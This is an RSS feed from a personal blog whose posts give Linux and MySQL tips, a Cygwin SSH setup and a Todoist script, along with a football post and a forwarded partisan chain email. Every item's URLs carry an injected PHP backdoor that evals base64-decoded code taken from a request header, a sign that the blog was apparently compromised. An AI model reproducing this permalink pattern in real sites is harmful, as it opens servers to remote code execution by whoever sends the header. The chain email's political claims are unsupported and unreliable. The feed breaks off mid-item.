<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	>

<channel>
	<title>Greg Jessup {Blog}</title>
	<atom:link href="http://gregjessup.com/feed/" rel="self" type="application/rss+xml" />
	<link>http://gregjessup.com</link>
	<description></description>
	<pubDate>Thu, 24 Feb 2011 13:23:10 +0000</pubDate>
	<generator>http://wordpress.org/?v=2.6.5</generator>
	<language>en</language>
			<item>
		<title>Setting TimeZone Linux Ubuntu</title>
		<link>http://gregjessup.com/2011/02/24/setting-timezone-linux-ubuntu/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/</link>
		<comments>http://gregjessup.com/2011/02/24/setting-timezone-linux-ubuntu/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/#comments</comments>
		<pubDate>Thu, 24 Feb 2011 13:23:10 +0000</pubDate>
		<dc:creator>Greg</dc:creator>
		
		<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://gregjessup.com/setting-timezone-linux-ubuntu/</guid>
		<description><![CDATA[cd /usr/share/zoneinfo

#remove the current localtime sym link (if its wrong, if it were correct, you would not be looking for this blog)
sudo rm localtime

#Create the new symlink to the new timezone I am in the NYC timezone...so
sudo ln -sf /usr/share/zoneinfo/America/New_York /etc/localtime

.csharpcode, .csharpcode pre
{
	font-size: small;
	color: black;
	font-family: consolas, "Courier New", courier, monospace;
	background-color: #ffffff;
	/*white-space: pre;*/
}
.csharpcode pre { margin: [...]]]></description>
			<content:encoded><![CDATA[<pre class="csharpcode">cd /usr/share/zoneinfo

#remove the current localtime sym link (if its wrong, if it were correct, you would not be looking for this blog)
sudo rm localtime

#Create the new symlink to the new timezone I am in the NYC timezone...so
sudo ln -sf /usr/share/zoneinfo/America/New_York /etc/localtime</pre>
<style type="text/css">
.csharpcode, .csharpcode pre
{
	font-size: small;
	color: black;
	font-family: consolas, "Courier New", courier, monospace;
	background-color: #ffffff;
	/*white-space: pre;*/
}
.csharpcode pre { margin: 0em; }
.csharpcode .rem { color: #008000; }
.csharpcode .kwrd { color: #0000ff; }
.csharpcode .str { color: #006080; }
.csharpcode .op { color: #0000c0; }
.csharpcode .preproc { color: #cc6633; }
.csharpcode .asp { background-color: #ffff00; }
.csharpcode .html { color: #800000; }
.csharpcode .attr { color: #ff0000; }
.csharpcode .alt 
{
	background-color: #f4f4f4;
	width: 100%;
	margin: 0em;
}
.csharpcode .lnum { color: #606060; }</style>
]]></content:encoded>
			<wfw:commentRss>http://gregjessup.com/2011/02/24/setting-timezone-linux-ubuntu/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Linux Kill All Processes By Name</title>
		<link>http://gregjessup.com/2011/02/11/linux-kill-all-processes-by-name/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/</link>
		<comments>http://gregjessup.com/2011/02/11/linux-kill-all-processes-by-name/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/#comments</comments>
		<pubDate>Fri, 11 Feb 2011 13:51:30 +0000</pubDate>
		<dc:creator>Greg</dc:creator>
		
		<category><![CDATA[How-To]]></category>

		<category><![CDATA[Linux]]></category>

		<category><![CDATA[Perl]]></category>

		<category><![CDATA[pgrep]]></category>

		<guid isPermaLink="false">http://gregjessup.com/linux-kill-all-processes-by-name/</guid>
		<description><![CDATA[Had a server with a bunch of hanging perl processes, and wanted to kill them all in one shot.
Solution:
kill -9 `pgrep perl`

.csharpcode, .csharpcode pre
{
	font-size: small;
	color: black;
	font-family: consolas, "Courier New", courier, monospace;
	background-color: #ffffff;
	/*white-space: pre;*/
}
.csharpcode pre { margin: 0em; }
.csharpcode .rem { color: #008000; }
.csharpcode .kwrd { color: #0000ff; }
.csharpcode .str { color: #006080; }
.csharpcode .op { [...]]]></description>
			<content:encoded><![CDATA[<p>Had a server with a bunch of hanging perl processes, and wanted to kill them all in one shot.</p>
<p><strong>Solution:</strong></p>
<pre class="csharpcode">kill -9 `pgrep perl`</pre>
<style type="text/css">
.csharpcode, .csharpcode pre
{
	font-size: small;
	color: black;
	font-family: consolas, "Courier New", courier, monospace;
	background-color: #ffffff;
	/*white-space: pre;*/
}
.csharpcode pre { margin: 0em; }
.csharpcode .rem { color: #008000; }
.csharpcode .kwrd { color: #0000ff; }
.csharpcode .str { color: #006080; }
.csharpcode .op { color: #0000c0; }
.csharpcode .preproc { color: #cc6633; }
.csharpcode .asp { background-color: #ffff00; }
.csharpcode .html { color: #800000; }
.csharpcode .attr { color: #ff0000; }
.csharpcode .alt 
{
	background-color: #f4f4f4;
	width: 100%;
	margin: 0em;
}
.csharpcode .lnum { color: #606060; }</style>
]]></content:encoded>
			<wfw:commentRss>http://gregjessup.com/2011/02/11/linux-kill-all-processes-by-name/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/feed/</wfw:commentRss>
		</item>
		<item>
		<title>MYSQL Import -&#8211;Force Not working when importing a mysqldump</title>
		<link>http://gregjessup.com/2011/02/09/mysql-import-force-not-working-when-importing-a-mysqldump/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/</link>
		<comments>http://gregjessup.com/2011/02/09/mysql-import-force-not-working-when-importing-a-mysqldump/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/#comments</comments>
		<pubDate>Wed, 09 Feb 2011 21:59:40 +0000</pubDate>
		<dc:creator>Greg</dc:creator>
		
		<category><![CDATA[MySQL]]></category>

		<category><![CDATA[SQL Server Stuff]]></category>

		<guid isPermaLink="false">http://gregjessup.com/mysql-import-force-not-working-when-importing-a-mysqldump/</guid>
		<description><![CDATA[This was a frustrating problem, because I had a a view and a routine in my dump that were using a function that had not been created by the dump as of yet. The –force command was not working for me…..
The Solution:

mysql -f -t -vvv -h localhost -u root -p &#60; importfile.sql


.csharpcode, .csharpcode pre
{
	font-size: small;
	color: [...]]]></description>
			<content:encoded><![CDATA[<p>This was a frustrating problem, because I had a a view and a routine in my dump that were using a function that had not been created by the dump as of yet. The –force command was not working for me…..</p>
<p><strong>The Solution:</strong></p>
<p><strong></strong></p>
<pre class="csharpcode">mysql -f -t -vvv -h localhost -u root -p &lt; importfile.sql</pre>
<p>
<style type="text/css">
.csharpcode, .csharpcode pre
{
	font-size: small;
	color: black;
	font-family: consolas, "Courier New", courier, monospace;
	background-color: #ffffff;
	/*white-space: pre;*/
}
.csharpcode pre { margin: 0em; }
.csharpcode .rem { color: #008000; }
.csharpcode .kwrd { color: #0000ff; }
.csharpcode .str { color: #006080; }
.csharpcode .op { color: #0000c0; }
.csharpcode .preproc { color: #cc6633; }
.csharpcode .asp { background-color: #ffff00; }
.csharpcode .html { color: #800000; }
.csharpcode .attr { color: #ff0000; }
.csharpcode .alt 
{
	background-color: #f4f4f4;
	width: 100%;
	margin: 0em;
}
.csharpcode .lnum { color: #606060; }</style>
</p>
<p>Dump and Import one Liner (put all on one line)</p>
<pre class="csharpcode">mysqldump -h remote.<span class="kwrd">host</span>.com -u username  -pPassword --lock-tables=<span class="kwrd">false</span> </pre>
<pre class="csharpcode">--routines=<span class="kwrd">true</span> MyDatabase | mysql -f -t -vvv -h localhost -u username2 –pPassword2 </pre>
<pre class="csharpcode">--force MyDatabase</pre>
<style type="text/css">
.csharpcode, .csharpcode pre
{
	font-size: small;
	color: black;
	font-family: consolas, "Courier New", courier, monospace;
	background-color: #ffffff;
	/*white-space: pre;*/
}
.csharpcode pre { margin: 0em; }
.csharpcode .rem { color: #008000; }
.csharpcode .kwrd { color: #0000ff; }
.csharpcode .str { color: #006080; }
.csharpcode .op { color: #0000c0; }
.csharpcode .preproc { color: #cc6633; }
.csharpcode .asp { background-color: #ffff00; }
.csharpcode .html { color: #800000; }
.csharpcode .attr { color: #ff0000; }
.csharpcode .alt 
{
	background-color: #f4f4f4;
	width: 100%;
	margin: 0em;
}
.csharpcode .lnum { color: #606060; }</style>
]]></content:encoded>
			<wfw:commentRss>http://gregjessup.com/2011/02/09/mysql-import-force-not-working-when-importing-a-mysqldump/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/feed/</wfw:commentRss>
		</item>
		<item>
		<title>STEELERS    24       J-E-T-S    19</title>
		<link>http://gregjessup.com/2011/01/24/steelers-24-j-e-t-s-19/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/</link>
		<comments>http://gregjessup.com/2011/01/24/steelers-24-j-e-t-s-19/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/#comments</comments>
		<pubDate>Mon, 24 Jan 2011 03:33:19 +0000</pubDate>
		<dc:creator>Greg</dc:creator>
		
		<category><![CDATA[J-E-T-S]]></category>

		<guid isPermaLink="false">http://gregjessup.com/steelers-24-j-e-t-s-19/</guid>
		<description><![CDATA[

YouTube
        - J-E-T-S suck Suck SUCK!
]]></description>
			<content:encoded><![CDATA[<div style="padding-bottom: 0px; margin: 0px; padding-left: 0px; padding-right: 0px; display: inline; float: none; padding-top: 0px" id="scid:53357c8b-5919-4e32-8c25-305d27c17a37:cfa52a0c-2299-46a7-9208-46fcfa63ff29" class="wlWriterEditableSmartContent"><embed src="http://www.youtube.com/v/gwCW2KpoZqQ&amp;NR=1" type="application/x-shockwave-flash" wmode="transparent" width="425" height="350"></embed><br />
<br />
<a href="http://www.youtube.com/watch?v=gwCW2KpoZqQ&amp;NR=1">YouTube<br />
        - J-E-T-S suck Suck SUCK!</a></div>
]]></content:encoded>
			<wfw:commentRss>http://gregjessup.com/2011/01/24/steelers-24-j-e-t-s-19/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Merging Identical MYSQL Tables on New Database</title>
		<link>http://gregjessup.com/2011/01/24/merging-identical-mysql-tables-on-new-database/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/</link>
		<comments>http://gregjessup.com/2011/01/24/merging-identical-mysql-tables-on-new-database/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/#comments</comments>
		<pubDate>Mon, 24 Jan 2011 03:26:00 +0000</pubDate>
		<dc:creator>Greg</dc:creator>
		
		<category><![CDATA[MySQL]]></category>

		<guid isPermaLink="false">http://gregjessup.com/merging-identical-mysql-tables-on-new-database/</guid>
		<description><![CDATA[I needed to take identical tables on 3 databases, and merge it onto a new table on a new database. Clearly the reason for the task was consolidation. My biggest complaint about mysql is its lack of linked servers. You can do federated, but lets be honest….It’s a pain in the %$#^ 
So when it [...]]]></description>
			<content:encoded><![CDATA[<p>I needed to take identical tables on 3 databases, and merge it onto a new table on a new database. Clearly the reason for the task was consolidation. My biggest complaint about mysql is its lack of linked servers. You can do federated, but lets be honest….It’s a pain in the %$#^ </p>
<p>So when it comes to consolidating, the best way (at least in my situation) was to manually merge the data. I thought of a few ways this could be done, but here is how I ended up doing it. </p>
<p><strong>1) DUMP DATA to a File.</strong></p>
<pre class="csharpcode">select broker_description,date,type,
       <span class="kwrd">case</span> when type = <span class="str">&quot;O&quot;</span> then abs(Shares*100)
       <span class="kwrd">else</span> abs(Shares) end <span class="kwrd">as</span> Quantity,
       commission,<span class="str">'someportfolio'</span> <span class="kwrd">as</span> portfolio
from accounting.trades r
join tickers t
on t.id = r.ticker
join exec_broker b
on b.id = r.exec_broker
<span class="kwrd">where</span> abs(commission &gt; 0)
INTO OUTFILE <span class="str">&quot;/tmp/dump.txt&quot;</span></pre>
<style type="text/css">
.csharpcode, .csharpcode pre
{
	font-size: small;
	color: black;
	font-family: consolas, "Courier New", courier, monospace;
	background-color: #ffffff;
	/*white-space: pre;*/
}
.csharpcode pre { margin: 0em; }
.csharpcode .rem { color: #008000; }
.csharpcode .kwrd { color: #0000ff; }
.csharpcode .str { color: #006080; }
.csharpcode .op { color: #0000c0; }
.csharpcode .preproc { color: #cc6633; }
.csharpcode .asp { background-color: #ffff00; }
.csharpcode .html { color: #800000; }
.csharpcode .attr { color: #ff0000; }
.csharpcode .alt 
{
	background-color: #f4f4f4;
	width: 100%;
	margin: 0em;
}
.csharpcode .lnum { color: #606060; }</style>
<p>&#160;</p>
<p><strong>2) SCP the dump file</strong> from server1 to server2 (server where merge table will be)</p>
<pre class="csharpcode">scp /tmp/dump.txt <a href="mailto:root@10.1.10.20:/tmp/">root@10.1.10.20:/tmp/
</a></pre>
<style type="text/css">
.csharpcode, .csharpcode pre
{
	font-size: small;
	color: black;
	font-family: consolas, "Courier New", courier, monospace;
	background-color: #ffffff;
	/*white-space: pre;*/
}
.csharpcode pre { margin: 0em; }
.csharpcode .rem { color: #008000; }
.csharpcode .kwrd { color: #0000ff; }
.csharpcode .str { color: #006080; }
.csharpcode .op { color: #0000c0; }
.csharpcode .preproc { color: #cc6633; }
.csharpcode .asp { background-color: #ffff00; }
.csharpcode .html { color: #800000; }
.csharpcode .attr { color: #ff0000; }
.csharpcode .alt 
{
	background-color: #f4f4f4;
	width: 100%;
	margin: 0em;
}
.csharpcode .lnum { color: #606060; }</style>
<p>&#160;</p>
<p><strong></strong></p>
<p><strong>3) IMPORT DATA </strong>(this assumes you scp’d the file to /tmp/ on the merge table server)</p>
<pre class="csharpcode"><span class="kwrd">LOAD</span> <span class="kwrd">DATA</span>  INFILE <span class="str">'/tmp/dump.txt'</span>
<span class="kwrd">INTO</span> <span class="kwrd">TABLE</span> commission
FIELDS TERMINATED <span class="kwrd">BY</span> <span class="str">'\t'</span>
LINES TERMINATED <span class="kwrd">BY</span> <span class="str">'\n'</span>
(broker_description, <span class="kwrd">date</span>, type,Quantity,commission,portfolio);</pre>
<style type="text/css">
.csharpcode, .csharpcode pre
{
	font-size: small;
	color: black;
	font-family: consolas, "Courier New", courier, monospace;
	background-color: #ffffff;
	/*white-space: pre;*/
}
.csharpcode pre { margin: 0em; }
.csharpcode .rem { color: #008000; }
.csharpcode .kwrd { color: #0000ff; }
.csharpcode .str { color: #006080; }
.csharpcode .op { color: #0000c0; }
.csharpcode .preproc { color: #cc6633; }
.csharpcode .asp { background-color: #ffff00; }
.csharpcode .html { color: #800000; }
.csharpcode .attr { color: #ff0000; }
.csharpcode .alt 
{
	background-color: #f4f4f4;
	width: 100%;
	margin: 0em;
}
.csharpcode .lnum { color: #606060; }</style>
<p>&#160;</p>
<p><strong>NOT NECESSARY FROM HERE DOWN&gt;&gt;&gt;&gt;&gt;THIS WAS AN EXTRA STEP</strong></p>
<p><strong></strong></p>
<p><strong>4) Dump server3 table</strong> data to file</p>
<p>In this case I actually needed to dump data from a mysql database that was on a Windows Server. Similar to step 1.</p>
<pre class="csharpcode">select broker_description,date,type,
       <span class="kwrd">case</span> when type = <span class="str">&quot;O&quot;</span> then abs(Shares*100)
       <span class="kwrd">else</span> abs(Shares) end <span class="kwrd">as</span> Quantity,
       commission,<span class="str">'portfolio2'</span> <span class="kwrd">as</span> portfolio
from accounting.trades r
join tickers t
on t.id = r.ticker
join exec_broker b
on b.id = r.exec_broker
<span class="kwrd">where</span> abs(commission &gt; 0)
INTO OUTFILE <span class="str">&quot;c:/temp/dump.txt&quot;</span></pre>
<style type="text/css">
.csharpcode, .csharpcode pre
{
	font-size: small;
	color: black;
	font-family: consolas, "Courier New", courier, monospace;
	background-color: #ffffff;
	/*white-space: pre;*/
}
.csharpcode pre { margin: 0em; }
.csharpcode .rem { color: #008000; }
.csharpcode .kwrd { color: #0000ff; }
.csharpcode .str { color: #006080; }
.csharpcode .op { color: #0000c0; }
.csharpcode .preproc { color: #cc6633; }
.csharpcode .asp { background-color: #ffff00; }
.csharpcode .html { color: #800000; }
.csharpcode .attr { color: #ff0000; }
.csharpcode .alt 
{
	background-color: #f4f4f4;
	width: 100%;
	margin: 0em;
}
.csharpcode .lnum { color: #606060; }</style>
<p>&#160;</p>
<p><strong>5) I used <a href="http://winscp.net/eng/index.php" onclick="javascript:pageTracker._trackPageview('/outbound/article/winscp.net');">WinSCP</a> to upload the file from c:\temp to /tmp on target server</strong></p>
]]></content:encoded>
			<wfw:commentRss>http://gregjessup.com/2011/01/24/merging-identical-mysql-tables-on-new-database/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Install OpenSSH on Windows 7</title>
		<link>http://gregjessup.com/2011/01/14/install-openssh-on-windows-7/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/</link>
		<comments>http://gregjessup.com/2011/01/14/install-openssh-on-windows-7/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/#comments</comments>
		<pubDate>Fri, 14 Jan 2011 14:49:55 +0000</pubDate>
		<dc:creator>Greg</dc:creator>
		
		<category><![CDATA[How-To]]></category>

		<category><![CDATA[CYGWIN]]></category>

		<category><![CDATA[SSH]]></category>

		<category><![CDATA[WINDOWS7]]></category>

		<guid isPermaLink="false">http://gregjessup.com/install-openssh-on-windows-7/</guid>
		<description><![CDATA[Net Net….this is a short version…but to the point. Its pretty simple.
Installing OpenSSH on windows 7
1) Download and install Cygwin    a. Be sure to choose openssh as one of the packages that gets installed.    2) Once setup is complete. Right Click Cygwin Icon on desktop and “Run as Administrator” [...]]]></description>
			<content:encoded><![CDATA[<p>Net Net….this is a short version…but to the point. Its pretty simple.</p>
<p>Installing OpenSSH on windows 7</p>
<p>1) Download and install <a href="http://cygwin.com/setup.exe" onclick="javascript:pageTracker._trackPageview('/outbound/article/cygwin.com');">Cygwin</a>    <br />a. Be sure to choose openssh as one of the packages that gets installed.    <br />2) Once setup is complete. Right Click Cygwin Icon on desktop and “Run as Administrator”    <br />3) execute “ssh-host-config” from the command line and anwser basic questions    <br />4) mkpasswd -cl &gt; /etc/passwd    <br />5) mkgroup –local &gt; /etc/group    <br />6) net start sshd</p>
]]></content:encoded>
			<wfw:commentRss>http://gregjessup.com/2011/01/14/install-openssh-on-windows-7/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/feed/</wfw:commentRss>
		</item>
		<item>
		<title>MYSQLDUMP and Import over SSH OneLiner</title>
		<link>http://gregjessup.com/2010/12/18/mysqldump-and-import-over-ssh-oneliner/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/</link>
		<comments>http://gregjessup.com/2010/12/18/mysqldump-and-import-over-ssh-oneliner/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/#comments</comments>
		<pubDate>Sat, 18 Dec 2010 19:02:09 +0000</pubDate>
		<dc:creator>Greg</dc:creator>
		
		<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://gregjessup.com/mysqldump-and-import-over-ssh-oneliner/</guid>
		<description><![CDATA[So you want to Import a mysql database from Server A to Server B over ssh? Easy!
1) Setup SSH to login automatically from Server A to Server B
On server A 
Create a private and public key.
&#160;&#160;&#160;&#160; ssh-keygen -t rsa   &#160;&#160;&#160;&#160; cat id_rsa.pub &#124; ssh user@ServerB &#8216;cat &#62;&#62; ~/.ssh/authorized_keys&#8217;    
Test that [...]]]></description>
			<content:encoded><![CDATA[<p>So you want to Import a mysql database from Server A to Server B over ssh? Easy!</p>
<p>1) Setup SSH to login automatically from Server A to Server B</p>
<p><strong><font size="3">On server A </font></strong></p>
<p><strong>Create a private and public key.</strong></p>
<p>&#160;&#160;&#160;&#160; ssh-keygen -t rsa   <br />&#160;&#160;&#160;&#160; cat id_rsa.pub | ssh <a href="mailto:user@ServerB">user@ServerB</a> &#8216;cat &gt;&gt; ~/.ssh/authorized_keys&#8217;    </p>
<p><strong>Test that login works automatically</strong></p>
<p>ssh <a href="mailto:user@ServerB">user@ServerB</a></p>
<p><strong></strong></p>
<p><strong>Still from Server A “MYSQLDUMP One Liner”</strong>    <br />ssh <a href="mailto:user@ServerB">user@ServerB</a> &#8216;mysqldump –u mysqlUser -pMyPassword &#8211;lock-tables=false yourdatabase&#8217; | mysql -h localhost -u greg –pYourOtherPassword yourImportDatabae</p>
]]></content:encoded>
			<wfw:commentRss>http://gregjessup.com/2010/12/18/mysqldump-and-import-over-ssh-oneliner/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Dear Grandpa,</title>
		<link>http://gregjessup.com/2010/12/04/dear-grandpa/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/</link>
		<comments>http://gregjessup.com/2010/12/04/dear-grandpa/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/#comments</comments>
		<pubDate>Sat, 04 Dec 2010 22:28:19 +0000</pubDate>
		<dc:creator>Greg</dc:creator>
		
		<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://gregjessup.com/dear-grandpa/</guid>
		<description><![CDATA[I usually hate all of the political junk mail that circulates through my inbox. Many times, I find the data points being used inaccurate, and it bothers the heck out of me, that people read the stuff and take it as gospel, without knowing the truth. However, this one hit closer to home for me. [...]]]></description>
			<content:encoded><![CDATA[<p>I usually hate all of the political junk mail that circulates through my inbox. Many times, I find the data points being used inaccurate, and it bothers the heck out of me, that people read the stuff and take it as gospel, without knowing the truth. However, this one hit closer to home for me. As a recent small business owner, I pay much closer attention to my taxes than I did when I was straight W2. And trust me, when you are paying lump sums out of pocket on a quarterly basis, it feels alot different than it did when it was skimmed off my bi-weekly paycheck.</p>
<p>Anyway, I enjoyed reading this…I hope you will too. Even if the truth hurts you.</p>
<p>See below…</p>
<p>&#160;</p>
<p><strong>John G. Is 63 years old and owns a small business.&#160; He&#8217;s a life-long Republican and sees that his dream of retiring next year has all but evaporated.&#160; With the stock market crashing and new taxes coming his way, John now assumes that he will work to his dying day.</strong></p>
<p><strong>John has a granddaughter.&#160; Ashley is a recent college grad.&#160; She drives a flashy hybrid car, wears all the latest fashions, and loves to go out to nightclubs and restaurants.&#160; Ashley campaigned hard for Barack Obama.&#160; After the election she made sure her grandfather (and all other Republican family members) received a big I told-you-so earful on how the world is going to be a much better place now that Obama and her party is taking over.</strong></p>
<p><strong>Having lost both roommates, Ashley recently ran short of cash and cannot pay the rent (again) on her 3-bedroom townhouse.&#160; As she had done many times in the past, she e-mailed her grandfather asking for some financial help.</strong></p>
<p><strong></strong></p>
<h4><u><strong>Here is his reply&#8230;</strong></u></h4>
<p><em>Sweetheart, I received your request for assistance.&#160; Ashley, you know I love you dearly and I &#8216;m sympathetic to your financial plight.&#160; Unfortunately, times have changed.&#160; With the election of President Obama, your grandmother and I have had to set forth a bold new economic plan of our own&#8230;&quot;The Ashley Economic Empowerment Plan.&quot;&#160; Let me explain.</em></p>
<p><em>Your grandmother and I are life-long, wage-earning tax payers.&#160; We have lived a comfortable life, as you know, but we have never had the fancier things like European vacations, luxury cars, etc.&#160; We have worked hard and were looking forward to retiring soon.&#160; But the plan has changed.&#160; Your president is raising our personal and business taxes significantly.&#160; He says it is so he can give our hard-earned money to other people.&#160; Do you know what this means, Ashley?&#160; It means less for us, and we must cut back on many business and personal expenses.     <br />You know the wonderful receptionist who worked in my office for more than 23 years?&#160; The one who always gave you candy when you came over to visit?&#160; I had to let her go last week.&#160; I can&#8217;t afford to pay her salary and all of the government-mandated taxes that go with having employees.&#160; Your grandmother will now work 4 days a week to answer phones, take orders and handle the books.&#160; We will be closed on Fridays and will lose even more income to the new Wal-Mart store that recently opened.      <br />I&#8217;m also very sorry to report that your cousin Frank will no longer be working summers in the warehouse.&#160; I called him at school this morning.&#160; He already knows about it and he&#8217;s upset because he will have to give up skydiving and his yearly trip to Greenland to survey the polar bears.      <br />That&#8217;s just the business side of things.&#160; Some personal economic effects of Obama&#8217;s new taxation policies include none other than you.&#160; You know very well that over the years your grandmother and I have given you thousands of dollars in cash, tuition assistance, food, housing, clothing, gifts, etc., etc. But, by your vote, you have chosen to help others &#8212; not at your expense &#8212; but at our expense.      <br />If you need money now, sweetheart, I recommend you call 202-456-1111.&#160; That is the direct phone number for the White House.&#160; You can also contact the White House here: </em><a href="http://www.whitehouse.gov/CONTACT/" onclick="javascript:pageTracker._trackPageview('/outbound/article/www.whitehouse.gov');"><em>http://www.whitehouse.gov/CONTACT/</em></a><em>.     <br />You yourself told me how foolish it is to vote Republican.&#160; You said Mr. Obama is going to be the People&#8217;s President, and is going to help every American live a better life.&#160; Based on everything you&#8217;ve told me, along with all the promises we heard during the campaign, I&#8217;m sure Mr. Obama will be happy to transfer some stimulus money into your bank account.&#160; Have him call me for the account number, which I memorized years ago&#8230;      <br />Perhaps you can now understand what I&#8217;ve been saying all my life:&#160; Those who vote for a president should consider the impact on the nation as a whole, and not be just concerned with what they can get for themselves.&#160; What Obama supporters don&#8217;t seem to realize is all of the money he is redistributing to illegal aliens and non-taxpaying Americans (the so-called &quot;less fortunate&quot;) comes from tax-paying families.&#160; <br />Remember how you told me, &quot;Only the richest of the rich will be affected&quot;?&#160; Well, guess what, honey? Because we own a business, your grandmother and I are now considered to be the richest of the rich. On paper, it might look that way, but in the real world, we are far from it.      <br />As you said while campaigning for Obama, some people will have to carry more of the burden so all of America can prosper.&#160; You understand what that means, right?&#160; It means that raising taxes on productive people results in their having less money; less money for everything, including granddaughters.      <br />I&#8217;m sorry, Ashley, but the well has run dry&#8230;&#160; The free lunches are over&#8230;&#160; I have no money to give you now.&#160; So, congratulations on your choice for &quot;change”.&#160; For future reference, I encourage you to try and add up the total value of the gifts and cash you have received from us, just since you went off to college, and compare it to what you expect to get from Mr. Obama over the next 4 (or <img src='http://gregjessup.com/wp-includes/images/smilies/icon_cool.gif' alt='8)' class='wp-smiley' /> years. I have not kept track of it, Ashley.&#160; It has all truly been the gift of our hearts.      <br />Remember, we love you dearly&#8230; but from now on you&#8217;ll need to call the number mentioned above.&#160; Your &quot;Savior&quot; has the money we would have given to you.&#160; Just try to get it from him.      <br />Good luck, sweetheart.      <br />Love,      <br />Grandpa</em></p>
]]></content:encoded>
			<wfw:commentRss>http://gregjessup.com/2010/12/04/dear-grandpa/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/feed/</wfw:commentRss>
		</item>
		<item>
		<title>Cutting through &#8220;Red Tape&#8221; with Free software and API from TODOIST</title>
		<link>http://gregjessup.com/2010/10/17/cutting-through-red-tape-with-free-software-and-api-from-todoist/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/</link>
		<comments>http://gregjessup.com/2010/10/17/cutting-through-red-tape-with-free-software-and-api-from-todoist/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/#comments</comments>
		<pubDate>Sun, 17 Oct 2010 15:49:23 +0000</pubDate>
		<dc:creator>Greg</dc:creator>
		
		<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://gregjessup.com/cutting-through-red-tape-with-free-software-and-api-from-todoist/</guid>
		<description><![CDATA[One client I was working with in the past wanted a weekly update and priority list of work that was completed in the last week, and what was on my plate for the coming week. Being someone that just can’t deal with red tape, I thought immediately, How am I going to automate this?
I began [...]]]></description>
			<content:encoded><![CDATA[<p>One client I was working with in the past wanted a weekly update and priority list of work that was completed in the last week, and what was on my plate for the coming week. Being someone that just can’t deal with red tape, I thought immediately, <strong>How am I going to automate this?</strong></p>
<p>I began my search for a simple, <strong><a href="http://goo.gl/MfLV" onclick="javascript:pageTracker._trackPageview('/outbound/article/goo.gl');" target="_blank">easy to use Task Manager</a></strong>. The criteria were as follows.</p>
<p>1) Easy to add/remove/manage tasks.</p>
<p>2) UI when mobile. I have a blackberry, so just an Iphone App won’t do. although todist has one. Along with a chrome plugin…which needs some work, but is pretty good.</p>
<p>3) Easy to manage multiple Projects</p>
<p>4) Free</p>
<p>5) Has an API</p>
<p>First stop Lifehacker, and came across this post <a title="http://goo.gl/QJYr" href="http://goo.gl/QJYr" onclick="javascript:pageTracker._trackPageview('/outbound/article/goo.gl');">http://goo.gl/QJYr</a></p>
<p>&#160;</p>
<p>After messing with todoist, I was impressed. The UI was so clean and simple. I love that.</p>
<p><b>Here is how my code works&#8230;.</b></p>
<p>1. [Client A] is setup as a project. </p>
<p>2. I add tasks and check them off. </p>
<p>3. Then Sunday morning, </p>
<p>&#160;&#160;&#160;&#160; a. my script looks up everything that was completed since last monday and puts it in the last week category.</p>
<p>&#160;&#160;&#160;&#160; b. takes all uncompleted tasks and set them as next week priorities.</p>
<p>&#160;&#160;&#160;&#160; c. I get an email that looks like:</p>
<p><strong>WEEK PRIORITIES     <br /></strong>* Post on Twitter    <br />* Email Clients    <br />* Order a new computer</p>
<p><strong>LAST WEEK     <br /></strong>* Did some good work    <br />* Installed SoftwareUI    <br />* Configured Router    <br />* Created Stock Alert System    </p>
<p>Very simple but <strong>cutting through red tape</strong> with technology.</p>
]]></content:encoded>
			<wfw:commentRss>http://gregjessup.com/2010/10/17/cutting-through-red-tape-with-free-software-and-api-from-todoist/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/feed/</wfw:commentRss>
		</item>
		<item>
		<title>svnsync: Can&#8217;t open &#8216;C:\DOCUME~1 Error</title>
		<link>http://gregjessup.com/2009/05/28/svnsync-cant-open-cdocume1-error/%&({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&%/</link>
